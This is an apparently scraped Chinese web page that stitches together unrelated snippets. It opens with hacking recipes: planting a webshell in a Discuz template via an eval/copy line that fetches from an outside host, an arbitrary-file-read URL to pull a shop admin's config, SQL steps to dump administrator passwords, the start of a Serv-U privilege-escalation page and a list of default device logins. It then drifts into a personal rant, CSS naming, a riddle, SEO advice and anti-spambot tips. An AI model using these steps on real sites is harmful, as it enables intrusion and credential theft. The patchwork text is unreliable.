蓝雨

1. 随便选一模板文件，选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.yezishell.cn/shell.txt
3. 在任意位置输入:
{eval copy('http://www.yezishell.cn/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样

读取任意文件漏洞:http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php
复制代码可以连上数据库.

mysql -h1.1..1.1 -uuser -ppass

use yourbasename;

select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

...

1..NET版本Serv-U提权程序 

<%@ Page Language="VB" Debug="true" %> 
<%@ import Namespace="System.Net.Sockets" %> 
<script runat="server"> 

    ’  
...

制造商 产品 型号 登陆方式 用户名 密码 权限 附注
=======================================================
3COM CellPlex 7000 Telnet tech tech
3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet
3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech
...

     出来也快一年了，没一点成就，突然发现自己从精神到物质都空空如也和来的时候一样。物质上还没在家的时候好，在这里一个地下室的房租在家里可以在市中心租一个三室两厅。。我TMD来这里干什么来了！整天忙到晚上半夜都没一点效益TMD干什么来了..

页头：header
登录条：loginBar
标志：logo
侧栏：sideBar
广告：banner
导航：nav
子导航：subNav
菜单：menu
子菜单：subMenu
搜索：search
滚动：scroll
页面主体：main
内容：content
标签页：tab
文章列表：list
提示信息：msg
...

这是一个很老的问题。

有3个人去投宿, 一晚30元. 三个人每人掏了10元凑够30元交给了老板. 后来老板说今天优惠只要25元就够了, 拿出5元命令服务生退还给他们, 服务生偷偷藏起了2元, 然后, 把剩下的3元钱分给了那三个人, 每人分到1元. 这样, 一开始每人掏了10元, 现在又退回1元, 也就是10-1=9, 每人只花了9元钱, 3个人每人9元, 3 X 9 = 27元 + 服务生藏起的2元=29元， 还有一元钱去了哪里？？？

前段时间我的SEO资料站被降权后，我在网站标题里加了一句“SEO最重要的是思路与心态”。确实如此，初学SEO的时候可能会感觉SEO技术很重要，但过于偏重技术，很容易盲目地去关注一些技术上的细节，比如一个页面里关键字密度多少才为好、关键字填几个效果比较好之类的。

实际上，思路更重要，只要整体思路是正确的，小范围的技术失误并不影响整体。

实际上，很多人学了一段时间SEO后就会发现，SEO技术含量并不高。那么，除了技术外，SEO更重要的是什么？

...

这是这段时间下载了一些论坛发帖机研究后的结论。其实当你研究了论坛注册机和发帖机后会发现其实他们也很简单：就是通过discuz的特有脚本，在百度和股沟里搜索到你的论坛地址，然后通过dz的特征码找到你的论坛注册链接。我们就是改特征码实现目的，因为发帖机不可能把论坛上图片链接多当成注册地址。

治论坛发帖机的根源需从注册开始，那么我们就来开始治疗吧！一共N步。

...

控制横向和纵向滚动条的显隐？
<body style=”overflow-y:hidden”> 去掉x轴
<body style=”overflow-x:hidden”> 去掉y轴
<body scroll=”no”>不显

——————————————————————————–
...